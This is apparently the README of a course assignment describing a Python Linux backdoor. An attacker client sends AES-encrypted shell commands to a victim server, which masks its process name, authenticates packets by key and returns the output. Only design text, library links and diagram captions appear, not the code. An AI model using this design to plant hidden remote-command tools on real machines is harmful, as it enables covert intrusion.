Linux backdoor implementation written in Python.

Linux backdoor implementation written in Python.

A backdoor is perceived as a negative vulnerability because it allows an attacker to obtain access to a victim’s machine without proper credentials. However, a backdoor is more than just a tool of exploitation. Generally speaking, the purpose of a backdoor is to allow access to a machine, implemented into the program by the programmer. This is without a doubt a security flaw, however, it is also a tool used for debugging and analytical purposes.
This assignment demonstrates a backdoor program where the attacker is capable of executing shell commands on the victim’s machine and returns the response to the attacker.server_terminal

Requirements
+ Backdoor must camouflage itself so as to deceive anyone looking at the process table.
+ Application must ensure that it only receives (authenticate) those packets that are meant for the backdoor itself.
+ The backdoor must interpret commands sent to it, execute them and send the results back.
+ Incorporate an encryption scheme of your choice into the backdoor.

Implementation
The program is written in python. There are two programs included in this assignment:
1. client.py (Attacker)
2. server.py (Backdoor Victim)
The client (attacker) program establishes a connection to the server (Victim) and will be able to execute Linux commands against the victim’s machine. The messages will be encrypted using the AES encryption scheme while sending data to the server. When the victim sends the message back to the client, it will be encrypted once again; hence, the message will be decrypted to plaintext.

The server (victim) will acquire the encrypted data, decrypt it and execute the command. The command will not appear on the victim’s message to emulate a hidden backdoor. The server then encrypts that
data, again with AES, and transmit the data back to the client.
The program uses two libraries:
1. pycrypto 2.6.1 – For Encryption
2. setproctitle 1.1.8 – To masquerade process title
It is important to note that to ensure that the attacking machine is also authenticating the packets by utilizing the secret key used (for encryption) as a form of a flag. Any other traffic will be ignored

Note: Both program requires pycrypto library to be installed Additionally, the server requires the setproctitle library to be installed
You may download the libraries from the links below:
https://pypi.python.org/packages/source/p/pycrypto/pycrypto-2.6.1.tar.gz
https://pypi.python.org/packages/source/s/setproctitle/setproctitle-1.1.8.tar.gz#md5=728f4c8c6031bbe56083a48594027edd

Client :

Backdoor-Client (Attacker Diagram)

Backdoor-Client (Attacker Diagram)



Server :

Backdoor-Server (Victim Diagram)

Backdoor-Server (Victim Diagram)



Usage :

Source : https://github.com/jeffreysasaki